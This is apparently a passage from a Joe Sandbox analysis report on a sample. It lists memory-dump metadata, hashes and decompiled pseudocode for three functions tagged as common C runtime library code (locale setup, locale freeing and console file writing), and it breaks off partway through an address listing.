0x00000000
0x00917052
0x00916e81
0x00916e81
0x00916e87
0x00000000
0x00916e89
0x00916e8e
0x00916e90
0x00000000
0x00916e96
0x00916e96
0x00000000
0x00916e96
0x00916e90
0x00916e87
0x00916e7f
0x00916e7a
0x00916e61
0x00916e33
0x00916e33
0x00916e38
0x00916e3e
0x00917053
0x00917055
0x00917055
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 00916E4D
_free.LIBCMT ref: 00916F26
_free.LIBCMT ref: 00916F53

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 5db0e7982a5619909573a70466f9801d1f8702500338e3d7786064cb8ed937a4
Instruction ID: 0ddc1db0b6068fa565ef9bd76a0d07f0719b84fea95ced4711ce3b860c8c9065
Opcode Fuzzy Hash: 5db0e7982a5619909573a70466f9801d1f8702500338e3d7786064cb8ed937a4
Instruction Fuzzy Hash: 3451FC71F0830AAFEF25AFB4A841BEDBBB9AF45310F144269E511972C1EB358981C751

Uniqueness

Uniqueness Score: -1.00%

Function 0090DCBB Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 255
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E0090DCBB(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				intOrPtr _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int* _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				intOrPtr _v772;
				signed int _v784;
				void* __ebp;
				signed int _t156;
				void* _t163;
				signed int _t164;
				signed int _t166;
				signed int _t167;
				intOrPtr _t168;
				signed int _t171;
				signed int _t173;
				signed int _t174;
				signed int _t177;
				signed int _t179;
				signed int _t182;
				signed int _t183;
				signed int _t185;
				signed int _t186;
				signed int _t202;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t212;
				void* _t213;
				signed int _t220;
				intOrPtr* _t221;
				char* _t228;
				intOrPtr _t232;
				intOrPtr* _t233;
				signed int _t235;
				signed int _t240;
				signed int _t241;
				intOrPtr _t246;
				void* _t247;
				void* _t250;
				signed int _t252;
				signed int _t254;
				signed int _t257;
				signed int* _t258;
				short _t259;
				signed int _t260;
				void* _t262;
				void* _t263;
				void* _t264;

				_t244 = __edx;
				_t156 =  *0x92c014; // 0xb29a853a
				_v8 = _t156 ^ _t260;
				_push(__ebx);
				_t212 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v736 = _t212;
				_v732 = E0090FBFC(__ecx, __edx) + 0x278;
				_t163 = E0090D3A6(_t212, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v716);
				_t263 = _t262 + 0x18;
				if(_t163 == 0) {
					L39:
					_t164 = 0;
					__eflags = 0;
					goto L40;
				} else {
					_t10 = _t212 + 2; // 0x6
					_t252 = _t10 << 4;
					_t166 =  &_v272;
					_v712 = _t252;
					_t244 =  *(_t252 + _t246);
					_t220 = _t244;
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t254 = _v712;
						if( *_t166 !=  *_t220) {
							break;
						}
						if( *_t166 == 0) {
							L6:
							_t167 = _v704;
						} else {
							_t259 =  *((intOrPtr*)(_t166 + 2));
							_v706 = _t259;
							_t254 = _v712;
							if(_t259 !=  *((intOrPtr*)(_t220 + 2))) {
								break;
							} else {
								_t166 = _t166 + 4;
								_t220 = _t220 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L6;
								}
							}
						}
						L8:
						if(_t167 != 0) {
							_t221 =  &_v272;
							_t244 = _t221 + 2;
							do {
								_t168 =  *_t221;
								_t221 = _t221 + 2;
								__eflags = _t168 - _v704;
							} while (_t168 != _v704);
							_v708 = (_t221 - _t244 >> 1) + 1;
							_t171 = E0091062B(4 + ((_t221 - _t244 >> 1) + 1) * 2);
							_v724 = _t171;
							__eflags = _t171;
							if(_t171 == 0) {
								goto L39;
							} else {
								_v720 =  *((intOrPtr*)(_t254 + _t246));
								_v740 =  *(_t246 + 0xa0 + _t212 * 4);
								_v744 =  *(_t246 + 8);
								_t228 =  &_v272;
								_v728 = _t171 + 4;
								_t173 = E009136F9(_t171 + 4, _v708, _t228);
								_t264 = _t263 + 0xc;
								__eflags = _t173;
								if(_t173 != 0) {
									_t174 = _v704;
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									E00909AAF();
									asm("int3");
									_push(_t260);
									_push(_t228);
									_v784 = _v784 & 0x00000000;
									_t177 = E0091037D(_v772, 0x20001004,  &_v784, 2);
									__eflags = _t177;
									if(_t177 == 0) {
										L49:
										return 0xfde9;
									}
									_t179 = _v12;
									__eflags = _t179;
									if(_t179 == 0) {
										goto L49;
									}
									return _t179;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t254 + _t246)) = _v728;
									if(_v272 != 0x43) {
										L17:
										_t182 = E0090D0C3(_t212, _t246,  &_v700);
										_t244 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L17;
										} else {
											_t244 = _v704;
											_t182 = _t244;
										}
									}
									 *(_t246 + 0xa0 + _t212 * 4) = _t182;
									__eflags = _t212 - 2;
									if(_t212 != 2) {
										__eflags = _t212 - 1;
										if(_t212 != 1) {
											__eflags = _t212 - 5;
											if(_t212 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v716;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v716;
										}
									} else {
										_t258 = _v732;
										 *(_t246 + 8) = _v716;
										_v708 = _t258[8];
										_t240 = _t258[9];
										_v716 = _t240;
										while(1) {
											__eflags =  *(_t246 + 8) -  *(_t258 + _t244 * 8);
											if( *(_t246 + 8) ==  *(_t258 + _t244 * 8)) {
												break;
											}
											_t210 =  *(_t258 + _t244 * 8);
											_t240 =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _v716;
											_t244 = _t244 + 1;
											_t212 = _v736;
											_v708 = _t210;
											_v716 = _t240;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L25:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t202 = E009133C3(_t244, __eflags, _v704, 1, 0x91f5d8, 0x7f,  &_v528,  *(_t246 + 8), 1);
												_t264 = _t264 + 0x1c;
												__eflags = _t202;
												if(_t202 == 0) {
													_t241 = _v704;
												} else {
													_t204 = _v704;
													do {
														 *(_t260 + _t204 * 2 - 0x20c) =  *(_t260 + _t204 * 2 - 0x20c) & 0x000001ff;
														_t204 = _t204 + 1;
														__eflags = _t204 - 0x7f;
													} while (_t204 < 0x7f);
													_t206 = E00906BD0( &_v528,  *0x92c184, 0xfe);
													_t264 = _t264 + 0xc;
													__eflags = _t206;
													_t241 = 0 | _t206 == 0x00000000;
												}
												_t258[1] = _t241;
												 *_t258 =  *(_t246 + 8);
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L37;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _t240;
										}
										goto L25;
									}
									L37:
									_t183 = _t212 * 0xc;
									_t111 = _t183 + 0x91f660; // 0x9046ef
									 *0x91d130(_t246);
									_t185 =  *((intOrPtr*)( *_t111))();
									_t232 = _v720;
									__eflags = _t185;
									if(_t185 == 0) {
										__eflags = _t232 - 0x92c290;
										if(_t232 == 0x92c290) {
											L44:
											_t186 = _v712;
										} else {
											_t257 = _t212 + _t212;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L44;
											} else {
												E0090F884( *((intOrPtr*)(_t246 + 0x28 + _t257 * 8)));
												E0090F884( *((intOrPtr*)(_t246 + 0x24 + _t257 * 8)));
												E0090F884( *(_t246 + 0xa0 + _t212 * 4));
												_t186 = _v712;
												_t235 = _v704;
												 *(_t186 + _t246) = _t235;
												 *(_t246 + 0xa0 + _t212 * 4) = _t235;
											}
										}
										_t233 = _v724;
										 *_t233 = 1;
										_t164 =  *(_t186 + _t246);
										 *((intOrPtr*)(_t246 + 0x28 + (_t212 + _t212) * 8)) = _t233;
									} else {
										 *((intOrPtr*)(_v712 + _t246)) = _t232;
										E0090F884( *(_t246 + 0xa0 + _t212 * 4));
										 *(_t246 + 0xa0 + _t212 * 4) = _v740;
										E0090F884(_v724);
										 *(_t246 + 8) = _v744;
										goto L39;
									}
									goto L40;
								}
							}
						} else {
							_t164 = _t244;
							L40:
							_pop(_t247);
							_pop(_t250);
							_pop(_t213);
							return E0090528B(_t164, _t213, _v8 ^ _t260, _t244, _t247, _t250);
						}
						goto L51;
					}
					asm("sbb eax, eax");
					_t167 = _t166 | 0x00000001;
					__eflags = _t167;
					goto L8;
				}
				L51:
			}

0x0090dcbb
0x0090dcc6
0x0090dccd
0x0090dcd0
0x0090dcd1
0x0090dcd4
0x0090dcd8
0x0090dcd9
0x0090dcdc
0x0090dcec
0x0090dd0f
0x0090dd14
0x0090dd19
0x0090dfcf
0x0090dfcf
0x0090dfcf
0x00000000
0x0090dd1f
0x0090dd1f
0x0090dd22
0x0090dd25
0x0090dd2b
0x0090dd31
0x0090dd34
0x0090dd36
0x0090dd39
0x0090dd43
0x0090dd49
0x00000000
0x00000000
0x0090dd4f
0x0090dd78
0x0090dd78
0x0090dd51
0x0090dd51
0x0090dd59
0x0090dd60
0x0090dd66
0x00000000
0x0090dd68
0x0090dd68
0x0090dd6b
0x0090dd76
0x00000000
0x00000000
0x00000000
0x00000000
0x0090dd76
0x0090dd66
0x0090dd85
0x0090dd87
0x0090dd90
0x0090dd96
0x0090dd99
0x0090dd99
0x0090dd9c
0x0090dd9f
0x0090dd9f
0x0090ddaf
0x0090ddbd
0x0090ddc2
0x0090ddc9
0x0090ddcb
0x00000000
0x0090ddd1
0x0090ddd7
0x0090dde4
0x0090dded
0x0090ddf3
0x0090de00
0x0090de07
0x0090de0c
0x0090de0f
0x0090de11
0x0090e04f
0x0090e055
0x0090e056
0x0090e057
0x0090e058
0x0090e059
0x0090e05a
0x0090e05f
0x0090e062
0x0090e065
0x0090e066
0x0090e078
0x0090e07d
0x0090e07f
0x0090e088
0x00000000
0x0090e088
0x0090e081
0x0090e084
0x0090e086
0x00000000
0x00000000
0x0090e08e
0x0090de17
0x0090de17
0x0090de25
0x0090de28
0x0090de3e
0x0090de45
0x0090de4a
0x0090de2a
0x0090de2a
0x0090de32
0x00000000
0x0090de34
0x0090de34
0x0090de3a
0x0090de3a
0x0090de32
0x0090de51
0x0090de58
0x0090de5b
0x0090df59
0x0090df5c
0x0090df69
0x0090df6c
0x0090df74
0x0090df74
0x0090df5e
0x0090df64
0x0090df64
0x0090de61
0x0090de61
0x0090de6d
0x0090de73
0x0090de79
0x0090de7c
0x0090de82
0x0090de85
0x0090de88
0x00000000
0x00000000
0x0090de8a
0x0090de93
0x0090de97
0x0090dea0
0x0090dea4
0x0090dea5
0x0090deab
0x0090deb1
0x0090deb7
0x0090deba
0x00000000
0x00000000
0x0090debc
0x0090dedb
0x0090dedb
0x0090dede
0x0090defb
0x0090df00
0x0090df03
0x0090df05
0x0090df43
0x0090df07
0x0090df07
0x0090df0d
0x0090df12
0x0090df1a
0x0090df1b
0x0090df1b
0x0090df32
0x0090df39
0x0090df3c
0x0090df3e
0x0090df3e
0x0090df49
0x0090df4f
0x0090df4f
0x0090df54
0x00000000
0x0090df54
0x0090debe
0x0090dec0
0x0090dec5
0x0090decb
0x0090ded4
0x0090ded7
0x0090ded7
0x00000000
0x0090dec0
0x0090df77
0x0090df77
0x0090df7b
0x0090df83
0x0090df89
0x0090df8c
0x0090df92
0x0090df94
0x0090dfe0
0x0090dfe6
0x0090e032
0x0090e032
0x0090dfe8
0x0090dfed
0x0090dfed
0x0090dff3
0x0090dff7
0x00000000
0x0090dff9
0x0090dffd
0x0090e006
0x0090e012
0x0090e017
0x0090e020
0x0090e026
0x0090e029
0x0090e029
0x0090dff7
0x0090e038
0x0090e040
0x0090e046
0x0090e049
0x0090df96
0x0090df9c
0x0090dfa6
0x0090dfb8
0x0090dfbf
0x0090dfcc
0x00000000
0x0090dfcc
0x00000000
0x0090df94
0x0090de11
0x0090dd89
0x0090dd89
0x0090dfd1
0x0090dfd4
0x0090dfd5
0x0090dfd8
0x0090dfdf
0x0090dfdf
0x00000000
0x0090dd87
0x0090dd80
0x0090dd82
0x0090dd82
0x00000000
0x0090dd82
0x00000000

APIs

Part of subcall function 0090FBFC: GetLastError.KERNEL32(?,00000000,?,0090BB24,00000000,00000000,?,?,009108B1,00000000,00000000,00000000,00000000,?), ref: 0090FC01
Part of subcall function 0090FBFC: SetLastError.KERNEL32(00000000,00000002,000000FF,?,009108B1,00000000,00000000,00000000,00000000,?), ref: 0090FC9F

_free.LIBCMT ref: 0090DFA6
_free.LIBCMT ref: 0090DFBF
_free.LIBCMT ref: 0090DFFD
_free.LIBCMT ref: 0090E006
_free.LIBCMT ref: 0090E012

Strings

C, xrefs: 0090DE17

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 6a1d6c8765659d4be44001496147633800708f093a9558bbce0268adcb6287ac
Instruction ID: d79aa9d3131329b521ea435c5495d9fcc6207cc9c9f8687466654df297613f4f
Opcode Fuzzy Hash: 6a1d6c8765659d4be44001496147633800708f093a9558bbce0268adcb6287ac
Instruction Fuzzy Hash: 25B15E75A0221A9FDB24DF54C884BADB3B5FF48304F5085AAE90AA7390D770AE90CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00917E40 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00917E40(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00917B8C(_t45, 7);
					E00917B8C(_t45 + 0x1c, 7);
					E00917B8C(_t45 + 0x38, 0xc);
					E00917B8C(_t45 + 0x68, 0xc);
					E00917B8C(_t45 + 0x98, 2);
					E0090F884( *((intOrPtr*)(_t45 + 0xa0)));
					E0090F884( *((intOrPtr*)(_t45 + 0xa4)));
					E0090F884( *((intOrPtr*)(_t45 + 0xa8)));
					E00917B8C(_t45 + 0xb4, 7);
					E00917B8C(_t45 + 0xd0, 7);
					E00917B8C(_t45 + 0xec, 0xc);
					E00917B8C(_t45 + 0x11c, 0xc);
					E00917B8C(_t45 + 0x14c, 2);
					E0090F884( *((intOrPtr*)(_t45 + 0x154)));
					E0090F884( *((intOrPtr*)(_t45 + 0x158)));
					E0090F884( *((intOrPtr*)(_t45 + 0x15c)));
					return E0090F884( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x00917e46
0x00917e4b
0x00917e54
0x00917e5f
0x00917e6a
0x00917e75
0x00917e83
0x00917e8e
0x00917e99
0x00917ea4
0x00917eb2
0x00917ec0
0x00917ed1
0x00917edf
0x00917eed
0x00917ef8
0x00917f03
0x00917f0e
0x00000000
0x00917f1e
0x00917f23

APIs

Part of subcall function 00917B8C: _free.LIBCMT ref: 00917BB1

_free.LIBCMT ref: 00917E8E

Part of subcall function 0090F884: HeapFree.KERNEL32(00000000,00000000,?,00917BB6,?,00000000,?,?,?,00917E59,?,00000007,?,?,0091834C,?), ref: 0090F89A
Part of subcall function 0090F884: GetLastError.KERNEL32(?,?,00917BB6,?,00000000,?,?,?,00917E59,?,00000007,?,?,0091834C,?,?), ref: 0090F8AC

_free.LIBCMT ref: 00917E99
_free.LIBCMT ref: 00917EA4
_free.LIBCMT ref: 00917EF8
_free.LIBCMT ref: 00917F03
_free.LIBCMT ref: 00917F0E
_free.LIBCMT ref: 00917F19

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: aa895a72d6848fa21dd0967e2e1473986c7e8e83c445fc0c4b96a520d2487db5
Instruction ID: 6ccd320527ff75717bd972deb442bd101be8fc76338b6454496709e8da15e242
Opcode Fuzzy Hash: aa895a72d6848fa21dd0967e2e1473986c7e8e83c445fc0c4b96a520d2487db5
Instruction Fuzzy Hash: 691181B2688B09AAD630F7F0CC07FCBF7AC9F84710F404865B69A67492DB75B5454690

Uniqueness

Uniqueness Score: -1.00%

Function 00911DCD Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E00911DCD(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				signed int _t242;
				intOrPtr _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				void* _t259;
				intOrPtr _t260;
				signed int _t261;
				signed char _t264;
				intOrPtr _t267;
				signed char* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				intOrPtr _t279;
				signed int _t280;
				struct _OVERLAPPED* _t282;
				struct _OVERLAPPED* _t284;
				signed int _t285;
				void* _t286;
				void* _t287;

				_t170 =  *0x92c014; // 0xb29a853a
				_v8 = _t170 ^ _t285;
				_t172 = _a8;
				_t264 = _t172 >> 6;
				_t242 = (_t172 & 0x0000003f) * 0x38;
				_t269 = _a12;
				_v108 = _t269;
				_v80 = _t264;
				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0x959cb0 + _t264 * 4)) + 0x18));
				_v44 = _t242;
				_v96 = _a16 + _t269;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E0090BAE4( &_v72, _t264, 0);
				_t273 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t245 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t245;
				_v104 = _t269;
				if(_t269 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t248 = _v44;
						_v51 =  *_t269;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x959cb0 + _v80 * 4));
						_v48 = _t186;
						if(_t245 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t267 = _v48 + 0x2e + _t248;
						_v116 = _t267;
						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t264 = _v96 - _t269;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t269 & 0x000000ff) + 0x92c950; // 0x0
							_t253 =  *_t72 + 1;
							_v48 = _t253;
							__eflags = _t253 - _t264;
							if(_t253 > _t264) {
								__eflags = _t264;
								if(_t264 <= 0) {
									goto L40;
								} else {
									_t278 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x959cb0 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t253 - 4;
								_v140 = _t241;
								_v56 = _t269;
								_v40 = (_t253 == 4) + 1;
								_t220 = E0091A011( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
								_t287 = _t286 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t279 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0x92c950)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t264) {
								__eflags = _t264;
								if(_t264 > 0) {
									_t280 = _t248;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t269));
										_t259 =  *((intOrPtr*)(0x959cb0 + _v80 * 4)) + _t280 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
										_t280 = _v44;
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									L39:
									_t273 = _v88;
								}
								L40:
								_t277 = _t273 + _t264;
								__eflags = _t277;
								L41:
								__eflags = _v60;
								_v88 = _t277;
							} else {
								_t264 = _v40;
								_t282 = _t241;
								_t260 = _v116;
								do {
									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
									_t282 =  &(_t282->Internal);
								} while (_t282 < _t264);
								_t283 = _v48;
								_t261 = _v44;
								if(_v48 > 0) {
									E00905ED0( &_v16 + _t264, _t269, _t283);
									_t261 = _v44;
									_t286 = _t286 + 0xc;
									_t264 = _v40;
								}
								_t272 = _v80;
								_t284 = _t241;
								do {
									 *( *((intOrPtr*)(0x959cb0 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
									_t284 =  &(_t284->Internal);
								} while (_t284 < _t264);
								_t269 = _v104;
								_t279 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E0091A011( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t287 = _t286 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t269 = _t269 - 1 + _t279;
									L27:
									_t269 =  &(_t269[1]);
									_v104 = _t269;
									_t193 = E009158D1(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t286 = _t287 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t273 = _v84 - _v108 + _t269;
											_v88 = _t273;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t269 >= _v96) {
														goto L48;
													} else {
														_t245 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t273 = _t273 + 1;
															_v88 = _t273;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t269;
							_t188 = E0090B565(_t264);
							_t249 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
								_push(1);
								_push(_t269);
								goto L26;
							} else {
								_t202 =  &(_t269[1]);
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t264 = _v80;
									_t251 = _v44;
									_t241 = _v33;
									 *((char*)(_t251 +  *((intOrPtr*)(0x959cb0 + _t264 * 4)) + 0x2e)) = _v33;
									 *(_t251 +  *((intOrPtr*)(0x959cb0 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0x959cb0 + _t264 * 4)) + 0x2d) | 0x00000004;
									_t277 = _t273 + 1;
									goto L41;
								} else {
									_t206 = E00911102( &_v76, _t269, 2);
									_t287 = _t286 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t269 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t264 = _t264 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
							_v23 =  *_t269;
							_push(2);
							 *(_t248 + _v48 + 0x2d) = _t264;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E00911102();
							_t287 = _t286 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t285;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E0090528B(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
			}

0x00911dd8
0x00911ddf
0x00911de2
0x00911dea
0x00911ded
0x00911dfa
0x00911dfd
0x00911e00
0x00911e07
0x00911e0f
0x00911e12
0x00911e15
0x00911e1b
0x00911e1d
0x00911e24
0x00911e2e
0x00911e30
0x00911e33
0x00911e36
0x00911e39
0x00911e3c
0x00911e3f
0x00911e45
0x00912150
0x00912150
0x00000000
0x00911e4b
0x00911e53
0x00911e56
0x00911e5c
0x00911e5f
0x00911e66
0x00911e6d
0x00911e70
0x00000000
0x00000000
0x00911e79
0x00911e7e
0x00911e80
0x00911e83
0x00911e88
0x00911e8c
0x00000000
0x00000000
0x00000000
0x00911e8c
0x00911e91
0x00911e93
0x00911e98
0x00911f52
0x00911f59
0x00911f5a
0x00911f5d
0x00911f5f
0x00912103
0x00912105
0x00000000
0x00912107
0x00912107
0x0091210a
0x00912119
0x0091211d
0x0091211e
0x0091211e
0x00000000
0x00912122
0x00911f65
0x00911f67
0x00911f6d
0x00911f70
0x00911f7c
0x00911f85
0x00911f90
0x00911f95
0x00911f98
0x00911f9b
0x00000000
0x00911fa1
0x00911fa1
0x00000000
0x00911fa1
0x00911f9b
0x00911e9e
0x00911ead
0x00911eae
0x00911eb1
0x00911eb4
0x00911eb9
0x009120cf
0x009120d1
0x009120d3
0x009120d5
0x009120df
0x009120e7
0x009120e9
0x009120ea
0x009120ee
0x009120f1
0x009120f1
0x009120f5
0x009120f5
0x009120f5
0x009120f8
0x009120f8
0x009120f8
0x009120fa
0x009120fa
0x009120fe
0x00911ebf
0x00911ebf
0x00911ec2
0x00911ec4
0x00911ec7
0x00911eca
0x00911ece
0x00911ecf
0x00911ed3
